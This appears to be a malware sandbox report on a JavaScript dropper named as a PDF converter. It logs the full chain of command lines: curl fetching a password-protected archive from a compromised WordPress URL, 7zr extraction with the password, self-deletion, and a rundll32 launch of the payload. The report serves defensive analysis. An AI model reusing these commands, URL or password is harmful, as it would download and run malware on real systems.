Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 14, 2023, 1:36 p.m. | Sept. 14, 2023, 1:38 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js
2544-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
2640 -
cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
2696 -
-
curl.exe curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location
2860
-
-
curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
2944 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
2576-
enim.q "C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a"
2700
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
2372 -
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
2772 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
1304 -
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
1892-
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
1736
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
3048
-
Name | Response | Post-Analysis Lookup |
---|---|---|
restohalto.site | ||
www.gentotarim.com |
CNAME
gentotarim.com
|
89.163.140.12 |
www.7-zip.org | 49.12.202.237 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.101:49169 89.163.140.12:443 |
None | None | None |
TLS 1.3 192.168.56.101:49173 49.12.202.237:443 |
None | None | None |
file | C:\Users\test22\AppData\Local\Temp\illo.g.bat |
cmdline | cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" |
cmdline | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" |
cmdline | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m"" |
cmdline | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q" |
cmdline | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m"" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q" |
cmdline | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
file | C:\Users\test22\AppData\Local\Temp\enim.q |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" |
file | C:\Users\test22\AppData\Local\Temp\laudantium.a |
file | C:\Users\test22\AppData\Local\Temp\enim.q |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\enim.q" | ||||||
parent_process | wscript.exe | martian_process | curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m"" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m"" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" | ||||||
parent_process | wscript.exe | martian_process | rundll32 "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js" |
file | C:\Windows\System32\cmd.exe |
file | C:\util\curl\curl.exe |
file | C:\Windows\System32\rundll32.exe |